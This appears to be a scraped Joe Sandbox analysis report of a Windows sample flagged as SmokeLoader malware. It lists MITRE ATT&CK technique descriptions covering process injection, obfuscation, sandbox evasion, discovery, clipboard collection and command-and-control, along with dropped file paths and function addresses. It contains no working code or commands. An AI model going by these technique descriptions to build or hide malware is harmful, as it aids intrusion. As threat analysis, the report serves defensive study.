Opcode Fuzzy Hash: e0e411ff4c247a5316448fc5701780ceddf569871ef39cf7942b1ea1165f1dde
Instruction Fuzzy Hash: 2631651569C3C0D9F331CBA8BC857297B62AB11B14F54307AD9848B2F1D3FA056A836F

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report oRKal761Qm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\46F6.exe

C:\Users\user\AppData\Local\Temp\E9D3.exe

C:\Users\user\AppData\Roaming\ssegbth

C:\Users\user\AppData\Roaming\ssegbth:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
oRKal761Qm.exe

Function 00423920 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 242
timememorylibraryCOMMON

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Function 005CDBB1 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0059003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00590E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 00423614 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre